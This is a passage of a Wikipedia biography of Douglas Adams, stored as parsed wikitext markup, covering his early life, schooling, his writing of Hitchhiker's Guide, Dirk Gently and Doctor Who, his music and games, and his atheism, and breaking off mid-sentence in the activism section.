index=\"3\"/><value>11</value></part><part><name index=\"4\"/><value>1952</value></part><part><name index=\"5\"/><value>3</value></part><part><name 
index=\"6\"/><value>11</value></part><part><name>df</name><equals>=</equals><value>yes</value></part></template>\n</value></part><part><name> death_place </name><equals>=</equals><value> [[Montecito, California]], U.S.\n</value></part><part><name> resting_place </name><equals>=</equals><value> [[Highgate Cemetery]], London, England\n</value></part><part><name> alma_mater </name><equals>=</equals><value> [[St John's College, Cambridge]]\n</value></part><part><name> occupation </name><equals>=</equals><value> Writer\n</value></part><part><name> genre </name><equals>=</equals><value> Science fiction, comedy, satire\n</value></part><part><name> movement </name><equals>=</equals><value>\n</value></part><part><name> website </name><equals>=</equals><value> <template><title>URL</title><part><name index=\"1\"/><value>douglasadams.com/</value></part></template>\n</value></part></template>\n<comment><!-- Do *not* change spelling of "Hitchhiker's"; see talk page for details -->\n</comment><comment><!-- Please do *not* change spelling of "Noel". There is no 'ë'. Any citations have themselves been taken from an earlier, incorrect edit of Wikipedia; see talk page for details -->\n</comment>'''Douglas Noel Adams''' (11 March 1952 – 11 May 2001) was an [[English people|English]] [[author]], [[scriptwriter]], [[essayist]], [[List of humorists|humourist]], [[satirist]] and [[dramatist]].\n\nAdams is best known as the author of ''[[The Hitchhiker's Guide to the Galaxy]]'', which originated in 1978 as a BBC [[The Hitchhiker's Guide to the Galaxy (radio series)|radio comedy]] before developing into a "trilogy" of five books that sold more than 15&nbsp;million copies in his lifetime and generated a [[The Hitchhiker's Guide to the Galaxy (TV series)|television series]], several stage plays, comics, a [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and in 2005 a [[The Hitchhiker's Guide to the Galaxy (film)|feature film]]. 
Adams's contribution to UK radio is commemorated in [[Radio Academy|The Radio Academy]]'s Hall of Fame.<ext><name>ref</name><attr> name="radioacad"</attr><inner>{{cite web|title=The Radio Academy Hall of Fame |url=http://www.radioacademy.org/hall-of-fame |work=The Radio Academy |accessdate=8 December 2011 |archiveurl=http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F |archivedate=8 December 2011 |deadurl=no |df=dmy }}</inner><close></ref></close></ext>\n\nAdams also wrote ''[[Dirk Gently's Holistic Detective Agency]]'' (1987) and ''[[The Long Dark Tea-Time of the Soul]]'' (1988), and co-wrote ''[[The Meaning of Liff]]'' (1983), ''[[The Deeper Meaning of Liff]]'' (1990), ''[[Last Chance to See]]'' (1990), and three stories for the television series ''[[Doctor Who]]''; he also served as [[script editor]] for the show's seventeenth season in 1979. A posthumous collection of his works, including an unfinished novel, was published as ''[[The Salmon of Doubt]]'' in 2002.\n\nAdams was known as an advocate for environmentalism and [[conservation movement|conservation]], as a lover of fast cars, cameras, [[technological innovation]] and the [[Apple Macintosh]], and as a "devout [[atheist]]".\n\n<h level=\"2\" i=\"1\">==Early life==</h>\n<comment><!-- Please leave this section heading as is, for the chronology of events. Adams's own family (wife and daughter) are discussed later. -->\n</comment>Adams was born on 11 March 1952 to Janet (née Donovan; 1927–2016) and Christopher Douglas Adams (1927–1985) in [[Cambridge]], England.<ext><name>ref</name><attr> name=ODNB </attr><inner>Webb 2005b</inner><close></ref></close></ext> The following year, [[James D. Watson|Watson]] and [[Francis Crick|Crick]] famously first modelled [[DNA]] at [[Cambridge University]], leading Adams to later quip that he, whose initials spelled DNA, had been in Cambridge months earlier. 
The family moved to [[East End of London|East London]] a few months after his birth, where his sister, Susan, was born three years later.<ext><name>ref</name><attr> name=Adams_xix</attr><inner>{{Harvnb|Adams|2002|pp=xix}}</inner><close></ref></close></ext> His parents divorced in 1957; Douglas, Susan, and their mother moved to an [[RSPCA]] animal shelter in [[Brentwood, Essex]], run by his maternal grandparents.<ext><name>ref</name><attr/><inner>Webb 2005a, p. 32.</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"2\">===Education===</h>\nAdams attended Primrose Hill Primary School in [[Brentwood, Essex|Brentwood]]. At nine, he passed the entrance exam for [[Brentwood School (Essex)|Brentwood School]], an independent school whose alumni include [[Robin Day]], [[Jack Straw]], [[Noel Edmonds]], and [[David Irving]]. [[Griff Rhys Jones]] was a year below him, and he was in the same class as [[Stuckism|Stuckist]] artist [[Charles Thomson (artist)|Charles Thomson]]. He attended the [[Preparatory school (UK)|prep school]] from 1959 to 1964, then the main school until December 1970. His form master, Frank Halford, said of him: "Hundreds of boys have passed through the school but Douglas Adams really stood out from the crowd — literally. He was unnecessarily tall and in his short trousers he looked a trifle self-conscious." "The form-master wouldn't say 'Meet under the clock tower,' or 'Meet under the war memorial'," he joked, "but 'Meet under Adams'."<ext><name>ref</name><attr> name=Adams_7</attr><inner>{{Harvnb|Adams|2002|pp=7}}</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>Botti, Nicholas. [http://douglasadams.eu/interview-with-frank-halford/ "Interview with Frank Halford"]. ''Life, DNA, and H2G2.'' 2009. Web. Retrieved 13 March 2012. 
(Click on link at bottom for facsimile page from ''Daily News'' article, 7 March 1998.)</inner><close></ref></close></ext> Yet it was his ability to write first-class stories that really made him "shine".<ext><name>ref</name><attr> name=Simpson_9</attr><inner>{{Harvnb|Simpson|2003|pp=9}}</inner><close></ref></close></ext>\n\nAdams was six feet tall (1.83&nbsp;m) by age 12 and stopped growing at 6&nbsp;ft 5&nbsp;in (1.96&nbsp;m). He became the only student ever to be awarded a ten out of ten by Halford for creative writing, something he remembered for the rest of his life, particularly when facing [[writer's block]].<ext><name>ref</name><attr> name=Adams_xix </attr></ext>\n\nSome of his earliest writing was published at the school, such as a report on its photography club in ''The Brentwoodian'' in 1962, or spoof reviews in the school magazine ''Broadsheet'', edited by [[Paul Neil Milne Johnstone]], who later became a character in ''The Hitchhiker's Guide''. He also designed the cover of one issue of the ''Broadsheet'', and had a letter and short story published nationally in ''[[Eagle (comic)|The Eagle]]'', the boys' comic, in 1965. A poem entitled "A Dissertation on the task of writing a poem on a candle and an account of some of the difficulties thereto pertaining" written by Adams in January 1970, at the age of 17, was discovered by archivist Stacey Harmer in a cupboard at the school in early 2014. In it, Adams rhymes "futile" with "mute, while" and "exhausted" with "of course did".<ext><name>ref</name><attr/><inner>Flood, Alison (March 2014). [http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones "Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard"], ''The Guardian'', 19 March 2014. 
Accessed 2 July 2014</inner><close></ref></close></ext> On the strength of a bravura essay on religious poetry that discussed [[the Beatles]] and [[William Blake]], he was awarded an [[Exhibition (scholarship)|Exhibition]] in English at [[St John's College, Cambridge]], going up in 1971. He wanted to join the [[Footlights]], an invitation-only student comedy club that has acted as a hothouse for comic talent. He was not elected immediately as he had hoped, and started to write and perform in revues with Will Adams (no relation) and Martin Smith, forming a group called "Adams-Smith-Adams", but became a member of the Footlights by 1973.<ext><name>ref</name><attr> name=Simpson_30-40</attr><inner>{{Harvnb|Simpson|2003|pp=30–40}}</inner><close></ref></close></ext> Despite doing very little work—he recalled having completed three essays in three years—he graduated in 1974 with a B.A. in [[English literature]].<ext><name>ref</name><attr> name=ODNB</attr></ext>\n\n<h level=\"2\" i=\"3\">==Career==</h>\n\n<h level=\"3\" i=\"4\">===Writing===</h>\nAfter leaving university Adams moved back to London, determined to break into TV and radio as a writer. An edited version of the ''Footlights Revue'' appeared on [[BBC Two|BBC2]] television in 1974. A version of the Revue performed live in London's [[West End of London|West End]] led to Adams being discovered by [[Monty Python]]'s [[Graham Chapman]]. The two formed a brief writing partnership, earning Adams a writing credit in [[List of Monty Python's Flying Circus episodes#6. Party Political Broadcast|episode 45]] of ''Monty Python'' for a sketch called "[[Patient Abuse]]". 
He is one of only two people outside the original Python members to get a writing credit (the other being [[Neil Innes]]).<ext><name>ref</name><attr> name=times</attr><inner>{{cite news|title=Terry Jones remembers Douglas Adams, 'the last of the Pythons'|newspaper=The Times|date=10 October 2009}}</inner><close></ref></close></ext> The sketch plays on the idea of mind-boggling paperwork in an emergency, a joke later incorporated into the [[Vogon]]s' obsession with paperwork. Adams also contributed to a sketch on the album for ''[[Monty Python and the Holy Grail]]''.\n\n[[File:DNA in Monty Python.jpg|thumb|Adams in his first ''[[Monty Python's Flying Circus|Monty Python]]'' appearance, in full surgeon's garb]]\n\nAdams had two brief appearances in the fourth series of ''[[Monty Python's Flying Circus]]''. At the beginning of episode 42, "The Light Entertainment War", Adams is in a surgeon's mask (as Dr. Emile Koning, according to on-screen captions), pulling on gloves, while [[Michael Palin]] narrates a sketch that introduces one person after another but never gets started. At the beginning of episode 44, "Mr. Neutron", Adams is dressed in a [[List of recurring Monty Python's Flying Circus characters#The Pepperpots|pepper-pot]] outfit and loads a missile onto a cart driven by [[Terry Jones]], who is calling for scrap metal ("Any old iron..."). The two episodes were broadcast in November 1974. Adams and Chapman also attempted non-Python projects, including ''[[Out of the Trees]]''.\n\nAt this point Adams's career stalled; his writing style was unsuited to the then-current style of radio and TV comedy.<ext><name>ref</name><attr> name=ODNB </attr></ext> To make ends meet he took a series of odd jobs, including as a hospital porter, barn builder, and chicken shed cleaner. He was employed as a bodyguard by a Qatari family, who had made their fortune in oil. 
Anecdotes about that job included that the family had once ordered one of everything from a hotel's menu, tried all the dishes, and sent out for hamburgers. Another story had to do with a prostitute sent to the floor Adams was guarding one evening. They acknowledged each other as she entered, and an hour later, when she left, she is said to have remarked, "At least you can read while you're on the job."<ext><name>ref</name><attr/><inner>Webb 2005a, p. 93.</inner><close></ref></close></ext>\n\nDuring this time Adams continued to write and submit sketches, though few were accepted. In 1976 his career had a brief improvement when he wrote and performed ''Unpleasantness at Brodie's Close'' at the [[Edinburgh Fringe]] festival. By Christmas work had dried up again, and a depressed Adams moved to live with his mother.<ext><name>ref</name><attr> name=ODNB </attr></ext> The lack of writing work hit him hard and low confidence became a feature of Adams's life; "I have terrible periods of lack of confidence [..] I briefly did therapy, but after a while I realised it was like a farmer complaining about the weather. You can't fix the weather&nbsp;– you just have to get on with it".<ext><name>ref</name><attr> name=Adams_prologue</attr><inner>{{Harvnb|Adams|2002|pp=prologue}}</inner><close></ref></close></ext>\n\nSome of Adams's early radio work included sketches for ''[[The Burkiss Way]]'' in 1977 and ''[[The News Huddlines]]''.<ext><name>ref</name><attr/><inner>''Hitchhiker: A Biography of Douglas Adams'' by M. J. Simpson, p87</inner><close></ref></close></ext> He also wrote, again with Chapman, the 20 February 1977 episode of ''Doctor on the Go'', a sequel to the ''[[Doctor in the House (TV series)|Doctor in the House]]'' television comedy series. 
After the [[The Hitchhiker's Guide to the Galaxy (radio series)|first radio series of ''The Hitchhiker's Guide'']] became successful, Adams was made a BBC radio producer, working on ''[[Week Ending]]'' and a pantomime called ''[[Black Cinderella Two Goes East]]''.<ext><name>ref</name><attr/><inner>Roberts, Jem. ''The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent'': London, 2009, p164-5</inner><close></ref></close></ext> He left after six months to become the script editor for ''[[Doctor Who]]''.\n\nIn 1979 Adams and [[John Lloyd (producer)|John Lloyd]] wrote scripts for two half-hour episodes of ''[[Doctor Snuggles]]'': "The Remarkable Fidgety River" and "The Great Disappearing Mystery" (episodes seven and twelve). John Lloyd was also co-author of two episodes from the original ''Hitchhiker'' radio series ("Fit the Fifth" and "Fit the Sixth", also known as "Episode Five" and "Episode Six"), as well as ''[[The Meaning of Liff]]'' and ''[[The Deeper Meaning of Liff]]''.\n\n<h level=\"4\" i=\"5\">====''The Hitchhiker's Guide to the Galaxy''====</h>\n<template lineStart=\"1\"><title>Main article</title><part><name index=\"1\"/><value>The Hitchhiker's Guide to the Galaxy</value></part></template>\n''The Hitchhiker's Guide to the Galaxy'' was a concept for a science-fiction comedy radio series pitched by Adams and radio producer [[Simon Brett]] to [[BBC Radio 4]] in 1977. Adams came up with an outline for a pilot episode, as well as a few other stories (reprinted in [[Neil Gaiman]]'s book ''[[Don't Panic: The Official Hitchhiker's Guide to the Galaxy Companion]]'') that could potentially be used in the series.\n[[File:Towelday-Innsbruck.jpg|thumb|upright|[[Towel Day]] 2005 in Innsbruck, Austria, where Adams first had the idea of ''The Hitchhiker's Guide''. In the novels a towel is the most useful thing a space traveller can have. 
The annual Towel Day (25 May) was first celebrated in 2001, two weeks after Adams's death.]]\n\nAccording to Adams, the idea for the title occurred to him while he lay drunk in a field in [[Innsbruck]], Austria, gazing at the stars. He was carrying a copy of the ''[[Hitch-hiker's Guide to Europe]]'', and it occurred to him that "somebody ought to write a ''Hitchhiker's Guide to the Galaxy''". He later said that the constant repetition of this anecdote had obliterated his memory of the actual event.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas| editor= Geoffrey Perkins (ed.), Additional Material by M. J. Simpson|title=[[The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts]] | page = 10 | edition =25th Anniversary | publisher=Pan Books | year=2003 | isbn=0-330-41957-9}}</inner><close></ref></close></ext>\n\nDespite the original outline, Adams was said to make up the stories as he wrote. He turned to [[John Lloyd (producer)|John Lloyd]] for help with the final two episodes of [[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Primary Phase|the first series]]. Lloyd contributed bits from an unpublished science fiction book of his own, called ''GiGax''.<ext><name>ref</name><attr/><inner>Webb 2005a, p. 120.</inner><close></ref></close></ext> Very little of Lloyd's material survived in later adaptations of ''Hitchhiker's'', such as the novels and the TV series. The TV series was based on the first six radio episodes, and sections contributed by Lloyd were largely re-written.\n\n[[BBC Radio 4]] broadcast the first radio series weekly in the UK in March and April 1978. The series was distributed in the United States by [[National Public Radio]]. Following the success of the first series, another episode was recorded and broadcast, which was commonly known as the Christmas Episode. 
[[The Hitchhiker's Guide to the Galaxy Primary and Secondary Phases#The Secondary Phase|A second series]] of five episodes was broadcast one per night, during the week of 21–25 January 1980.\n\nWhile working on the radio series (and with simultaneous projects such as ''[[The Pirate Planet]]'') Adams developed problems keeping to writing deadlines that only got worse as he published novels. Adams was never a prolific writer and usually had to be forced by others to do any writing. This included being locked in a hotel suite with his editor for three weeks to ensure that ''[[So Long, and Thanks for All the Fish]]'' was completed.<ext><name>ref</name><attr/><inner>Felch 2004</inner><close></ref></close></ext> He was quoted as saying, "I love deadlines. I love the whooshing noise they make as they go by."<ext><name>ref</name><attr> name=Simpson_236</attr><inner>{{Harvnb|Simpson|2003|pp=236}}</inner><close></ref></close></ext> Despite the difficulty with deadlines, Adams wrote five novels in the series, published in 1979, 1980, 1982, 1984, and 1992.\n\nThe books formed the basis for other adaptations, such as three-part comic book adaptations for each of the first three books, an interactive text-adventure [[The Hitchhiker's Guide to the Galaxy (computer game)|computer game]], and a photo-illustrated edition, published in 1994. 
This latter edition featured a [[42 Puzzle]] designed by Adams, which was later incorporated into paperback covers of the first four ''Hitchhiker's'' novels (the paperback for the fifth re-used the artwork from the hardback edition).<ext><name>ref</name><attr/><inner>[http://www.iblist.com/series.php?id=2 Internet Book List] page, with links to all five novels, and reproductions of the 1990s paperback covers that included the [[42 Puzzle]].</inner><close></ref></close></ext>\n\nIn 1980 Adams also began attempts to turn the first ''Hitchhiker's'' novel into a movie, making several trips to Los Angeles, and working with a number of Hollywood studios and potential producers. The next year, the radio series became the basis for a BBC television mini-series<ext><name>ref</name><attr/><inner>{{citation|url=http://www.imdb.com/title/tt0081874/|title=''The Hitch Hiker's Guide to the Galaxy''|publisher=Internet Movie Database}}</inner><close></ref></close></ext> broadcast in six parts. When he died in 2001 in California, he had been trying again to get the movie project started with [[Disney]], which had bought the rights in 1998. The screenplay finally got a posthumous re-write by [[Karey Kirkpatrick]], and [[The Hitchhiker's Guide to the Galaxy (film)|the resulting film]] was released in 2005.\n\nRadio producer [[Dirk Maggs]] had consulted with Adams, first in 1993, and later in 1997 and 2000 about creating a third radio series, based on the third novel in the ''Hitchhiker's'' series.<ext><name>ref</name><attr/><inner>{{cite book | author=Adams, Douglas. | editor = [[Dirk Maggs]], dramatisations and editor | title=The Hitchhiker's Guide to the Galaxy Radio Scripts: The Tertiary, Quandary and Quintessential Phases | publisher=Pan Books | year=2005|isbn=0-330-43510-8 |pages=xiv | nopp=true}}</inner><close></ref></close></ext> They also discussed the possibilities of radio adaptations of the final two novels in the five-book "trilogy". 
As with the movie, this project was only realised after Adams's death. The third series, ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Tertiary Phase|The Tertiary Phase]]'', was broadcast on [[BBC Radio 4]] in September 2004 and was subsequently released on audio CD. With the aid of a recording of his reading of ''Life, the Universe and Everything'' and editing, Adams can be heard playing the part of Agrajag posthumously. ''So Long, and Thanks for All the Fish'' and ''Mostly Harmless'' made up the fourth and fifth radio series, respectively (on radio they were titled ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quandary Phase|The Quandary Phase]]'' and ''[[The Hitchhiker's Guide to the Galaxy Tertiary to Quintessential Phases#The Quintessential Phase|The Quintessential Phase]]'') and these were broadcast in May and June 2005, and also subsequently released on Audio CD. The last episode in the last series (with a new, "more upbeat" ending) concluded with, "The very final episode of ''The Hitchhiker's Guide to the Galaxy'' by Douglas Adams is affectionately dedicated to its author."<ext><name>ref</name><attr/><inner>Adams, ''Dirk Maggs'', Page 356.</inner><close></ref></close></ext>\n\n<h level=\"4\" i=\"6\">====''Dirk Gently'' series====</h>\n[[File:Douglas Adams San Francisco.jpg|thumb|Adams in March 2000]]\nIn between Adams's first trip to Madagascar with [[Mark Carwardine]] in 1985, and their series of travels that formed the basis for the radio series and non-fiction book ''[[Last Chance to See]]'', Adams wrote two other novels with a new cast of characters. 
''[[Dirk Gently's Holistic Detective Agency]]'' was first published in 1987, and was described by its author as "a kind of ghost-horror-detective-time-travel-romantic-comedy-epic, mainly concerned with mud, music and quantum mechanics".<ext><name>ref</name><attr/><inner>{{cite book|author=[[Neil Gaiman|Gaiman, Neil]] | title=Don't Panic: Douglas Adams & The Hitchhiker's Guide to the Galaxy | edition=Second U.S. | publisher=Titan Books | year=2003 | page=169 | isbn=1-84023-742-2}}</inner><close></ref></close></ext> It was derived from two Doctor Who serials Adams had written.\n\nA sequel novel, ''[[The Long Dark Tea-Time of the Soul]]'', was published a year later. This was an entirely original work, Adams's first since ''So Long, and Thanks for All the Fish.'' After the book tour, Adams set off on his round-the-world excursion which supplied him with the material for ''Last Chance to See''.\n\n<h level=\"4\" i=\"7\">====''Doctor Who''====</h>\n<template lineStart=\"1\"><title>Main article</title><part><name index=\"1\"/><value>Doctor Who</value></part></template>\nAdams sent the script for the ''HHGG'' pilot radio programme to the ''Doctor Who'' production office in 1978, and was commissioned to write ''[[The Pirate Planet]]'' (see below). He had also previously attempted to submit a potential movie script, called "Doctor Who and the Krikkitmen", which later became his novel ''Life, the Universe and Everything'' (which in turn became the third ''Hitchhiker's Guide'' radio series). Adams then went on to serve as script editor on the show for its seventeenth season in 1979. 
Altogether, he wrote three [[List of Doctor Who serials|''Doctor Who'' serials]] starring [[Tom Baker]] as [[The Doctor (Doctor Who)|the Doctor]]:\n* "[[The Pirate Planet]]" (the second serial in the "[[The Key to Time|Key to Time]]" arc, in [[Doctor Who (season 16)|season 16]])\n* "[[City of Death]]" (with producer [[Graham Williams (television producer)|Graham Williams]], from an original storyline by writer [[David Fisher (writer)|David Fisher]]. It was transmitted under the pseudonym "[[David Agnew]]")\n* "[[Shada]]" (only partially filmed; not televised due to [[strike action|industry disputes]])\n\nThe episodes authored by Adams are some of the few that were not novelised as Adams would not allow anyone else to write them, and asked for a higher price than the publishers were willing to pay.<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.skepticfiles.org/en001/drwhogde.htm |title=A 1990s Doctor Who FAQ |publisher=Skepticfiles.org |accessdate=11 March 2013}}</inner><close></ref></close></ext> "Shada" was later adapted as a novel by [[Gareth Roberts (writer)|Gareth Roberts]] in 2012 and "City of Death" by [[James Goss (producer)|James Goss]] in 2015.\n\nAdams was also known to allow in-jokes from ''The Hitchhiker's Guide'' to appear in the ''Doctor Who'' stories he wrote and other stories on which he served as Script Editor. Subsequent writers have also inserted ''Hitchhiker's'' references, even [[The Rings of Akhaten|as recently as 2013]]. Conversely, at least one reference to ''Doctor Who'' was worked into a ''Hitchhiker's'' novel. In ''[[Life, the Universe and Everything]]'', two characters travel in time and land on the pitch at [[Lord's Cricket Ground]]. 
The reaction of the radio commentators to their sudden appearance is very similar to the reactions of commentators in a scene in the eighth episode of the 1965–66 story ''[[The Daleks' Master Plan]]'', which has the Doctor's [[TARDIS]] [[Materialization (science fiction)|materialise]] on the pitch at Lord's.\n\nElements of ''Shada'' and ''City of Death'' were reused in Adams's later novel ''[[Dirk Gently's Holistic Detective Agency]]'', in particular the character of [[Professor Chronotis]]. [[Big Finish Productions]] eventually remade ''Shada'' as an audio play starring [[Paul McGann]] as the Doctor. Accompanied by partially animated illustrations, it was [[Doctor Who spin-offs#Webcasts|webcast]] on the [[BBC Online|BBC website]] in 2003, and subsequently released as a two-CD set later that year. An omnibus edition of this version was broadcast on the digital radio station [[BBC7]] on 10 December 2005.\n\nIn the ''Doctor Who'' 2012 Christmas episode ''[[The Snowmen#Production|The Snowmen]]'', writer [[Steven Moffat]] was inspired by a storyline that Adams pitched called ''The Doctor Retires''.<ext><name>ref</name><attr/><inner>{{cite web|last=Moffat |first=Steven |url=http://www.radiotimes.com/news/2012-12-24/doctor-who-christmas-special-steven-moffat-matt-smith-and-jenna-louise-coleman-reveal-all |title=Doctor Who Christmas special: Steven Moffat, Matt Smith and Jenna-Louise Coleman reveal all |work=Radio Times |date=24 December 2012 |accessdate=8 July 2013}}</inner><close></ref></close></ext>\n\nWhile he was at school,<template><title>which</title><part><name>date</name><equals>=</equals><value>October 2015</value></part></template> he wrote and performed a play called ''Doctor Which''.<ext><name>ref</name><attr> name=Adams_xx</attr><inner>{{Harvnb|Adams|2002|pp=xx}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"8\">===Music===</h>\nAdams played the guitar left-handed and had a collection of twenty-four left-handed guitars when he died (having 
received his first guitar in 1964). He also studied piano in the 1960s with the same teacher as [[Paul Wickens]], the pianist who plays in [[Paul McCartney]]'s band (and composed the music for the 2004–2005 editions of the ''Hitchhiker's Guide'' radio series).<ext><name>ref</name><attr/><inner>Webb, page 49.</inner><close></ref></close></ext> [[Pink Floyd]] and [[Procol Harum]] had an important influence on Adams's work.\n\n<h level=\"4\" i=\"9\">====Pink Floyd====</h>\n\nAdams included a reference to [[Pink Floyd]] in the original radio version of ''[[The Hitchhiker's Guide to the Galaxy]]'', in which he describes the main characters surveying the landscape of an alien planet while Marvin, their android companion, hums Pink Floyd's "[[Shine on You Crazy Diamond]]" (Part 1). This was cut out of the CD version. Adams also compared the various noises that the [[kakapo]] makes to "Pink Floyd studio out-takes" in his non-fiction book on endangered species, ''[[Last Chance to See]]''.\n\nAdams's official biography shares its name with the song "[[Wish You Were Here (1975 song)|Wish You Were Here]]" by Pink Floyd. 
Adams was friends with Pink Floyd guitarist [[David Gilmour]] and, on his 42nd birthday, was invited to make a guest appearance at Pink Floyd's concert of 28 October 1994 at Earls Court in London, playing guitar on the songs "[[Brain Damage (song)|Brain Damage]]" and "[[Eclipse (song)|Eclipse]]".<ext><name>ref</name><attr> name=Mabbett-MM</attr><inner>{{Cite book |publisher= Omnibus Press |isbn= 978-1-84938-370-7 |last= Mabbett |first= Andy |title= Pink Floyd – The Music and the Mystery |location= London |year= 2010 }}</inner><close></ref></close></ext> Adams chose the name for Pink Floyd's 1994 album, ''[[The Division Bell]]'', by picking the words from the lyrics to one of its tracks, "High Hopes".<ext><name>ref</name><attr> name=Mabbett-MM </attr></ext> Gilmour also performed at Adams's memorial service in 2001, and at what would have been Adams's 60th birthday party in 2012.\n\n<h level=\"4\" i=\"10\">====Procol Harum====</h>\nAdams was a friend of [[Gary Brooker]], the lead singer, pianist and songwriter of [[Procol Harum]], and invited him to many of the parties he held at his house. On one such occasion Brooker performed the full four-verse version of "[[A Whiter Shade of Pale]]". Brooker also performed at Adams's memorial service.\n\nAdams appeared on stage with Brooker to perform "In Held 'Twas in I" at Redhill when the band's lyricist [[Keith Reid]] was not available. On several other occasions he introduced Procol Harum at their gigs.\n\nAdams would listen to music while writing, and this would occasionally influence his work. On one occasion the title track from the Procol Harum album ''[[Grand Hotel (album)|Grand Hotel]]'' was playing when\n<template lineStart=\"1\"><title>quotation</title><part><name index=\"1\"/><value>Suddenly in the middle of the song there was this huge orchestral climax that came out of nowhere and did not seem to be about anything. I kept wondering what was this huge thing happening in the background?
And I eventually thought&nbsp;... it sounds as if there ought to be some sort of floorshow going on. Something huge and extraordinary, like, well, like the end of the universe. And so that was where the idea for The Restaurant at the End of the Universe came from.</value></part><part><name index=\"2\"/><value>Douglas Adams</value></part><part><name index=\"3\"/><value>Procol Harum at The Barbican<ext><name>ref</name><attr/><inner>{{cite web|url=http://www.procolharum.com/dadams.htm |title=Text of one of Douglas Adams's introductions of Procol Harum in concert |accessdate=21 August 2006|last=Adams |first=Douglas |date=8 February 1996}}</inner><close></ref></close></ext></value></part></template>\n\n<h level=\"3\" i=\"11\">===Computer games and projects===</h>\nDouglas Adams created an [[interactive fiction]] version of ''[[The Hitchhiker's Guide to the Galaxy (computer game)|HHGG]]'' with [[Steve Meretzky]] from [[Infocom]] in 1984. In 1986 he participated in a week-long brainstorming session with the [[Lucasfilm Games]] team for the game ''[[Labyrinth: The Computer Game|Labyrinth]]''. Later he was also involved in creating ''[[Bureaucracy (computer game)|Bureaucracy]]'' (also by Infocom, but not based on any book; Adams wrote it as a parody of events in his own life).\n\nAdams was a founder-director and Chief Fantasist of [[The Digital Village]], a digital media and Internet company with which he created ''[[Starship Titanic]]'', a [[Codie]] Award-winning and [[BAFTA#Games Awards|BAFTA-nominated adventure game]], which was published in 1998 by [[Simon & Schuster]].<ext><name>ref</name><attr> name="bbc.co.uk"</attr><inner>BBC Online (no date) [http://www.bbc.co.uk/cult/hitchhikers/dna/biog.shtml "The Hitchhiker's Guide to the Galaxy: DNA (1952-2001)"] Accessed 9 July 2014</inner><close></ref></close></ext><ext><name>ref</name><attr/><inner>Botti, Nicolas (2009). 
[http://www.douglasadams.eu/en_adams_bio.php "Life, DNA & h2g2: Douglas Adams's Biography"] Accessed 9 July 2014</inner><close></ref></close></ext> [[Terry Jones]] wrote the accompanying book, entitled ''Douglas Adams Starship Titanic'', since Adams was too busy with the computer game to do both. In April 1999, Adams initiated the [[h2g2]] [[collaborative writing]] project, an experimental attempt at making ''The Hitchhiker's Guide to the Galaxy'' a reality, and at harnessing the collective brainpower of the internet community. It found a new home at BBC Online in 2001.<ext><name>ref</name><attr> name="bbc.co.uk"</attr></ext>\n\nIn 1990 Adams wrote and presented a television documentary programme ''[[Hyperland]]''<ext><name>ref</name><attr/><inner>[http://www.imdb.com/title/tt0188677/ Internet Movie Database's page for ''Hyperland'']</inner><close></ref></close></ext> which featured [[Tom Baker]] as a "software agent" (similar to the assistant pictured in Apple's [[Knowledge Navigator]] video of future concepts from 1987), and interviews with [[Ted Nelson]], the co-inventor of [[hypertext]] and the person who coined the term. Although Adams did not invent hypertext, he was an [[early adopter]] and advocate of it. This was the same year that [[Tim Berners-Lee]] used the idea of hypertext in his [[HTML]].\n\n<h level=\"2\" i=\"12\">==Personal beliefs and activism==</h>\n\n<h level=\"3\" i=\"13\">===Atheism and views on religion===</h>\nAdams described himself as a "radical [[atheist]]", adding ''radical'' for emphasis so he would not be asked if he meant agnostic. He told [[American Atheists]] that this made things easier, but most importantly it conveyed the fact that he really meant it. "I am convinced that there is not a god," he said. He imagined a [[Fine-tuned Universe#In popular culture|sentient puddle]] who wakes up one morning and thinks, "This is an interesting world I find myself in – an interesting hole I find myself in – fits me rather neatly, doesn't it? 
In fact it fits me staggeringly well, must have been made to have me in it!" to demonstrate his view that the [[fine-tuned Universe]] argument for God was a fallacy.<ext><name>ref</name><attr/><inner>Adams 1998.</inner><close></ref></close></ext>\n\nDespite this, he remained fascinated by religion because of its effect on human affairs. "I love to keep poking and prodding at it. I've thought about it so much over the years that that fascination is bound to spill over into my writing."<ext><name>ref</name><attr> name=amath</attr><inner>{{cite journal|last=Silverman |first=Dave |title=Interview: Douglas Adams |journal=American Atheist |year=1998–1999 |volume=37 |issue=1 |url=http://www.atheists.org/Interview%3A__Douglas_Adams |accessdate=16 August 2009 |archiveurl=http://www.webcitation.org/63mRFcWVO?url=http%3A%2F%2Fwww.atheists.org%2FInterview%253A__Douglas_Adams |archivedate=8 December 2011 |deadurl=no |df=dmy }}</inner><close></ref></close></ext>\n\nThe evolutionary biologist and atheist [[Richard Dawkins]] uses Adams's influence throughout to exemplify arguments for non-belief in his 2006 book ''[[The God Delusion]]''. 
Dawkins dedicated the book to Adams, whom he jokingly called "possibly [my] only convert" to atheism<ext><name>ref</name><attr> name="TheGuardian"</attr><inner>{{cite news|url=http://books.guardian.co.uk/reviews/roundupstory/0,,1939704,00.html |title=Observer, '&#39;The God Delusion'&#39;, 5&nbsp;November 2006|newspaper=[[The Guardian]]|date=5 November 2006 |accessdate=1 June 2009 | location=London | first=Kim | last=Bunce}}</inner><close></ref></close></ext> and wrote on his death that "Science has lost a friend, literature has lost a luminary, the [[mountain gorilla]] and the [[black rhino]] have lost a gallant defender."<ext><name>ref</name><attr> name=Dawkins2001</attr><inner>{{cite news|last=Dawkins|first=Richard|title=Lament for Douglas Adams|url=http://www.guardian.co.uk/uk/2001/may/14/books.booksnews|accessdate=29 December 2012|newspaper=The Guardian|date=13 May 2001}}</inner><close></ref></close></ext>\n\n<h level=\"3\" i=\"14\">===Environmental activism===</h>\nAdams was also an [[environmental activist]] who campaigned on behalf of [[endangered species]]. This activism included the production of the non-fiction radio series ''[[Last Chance to See]]'', in which he and [[natural 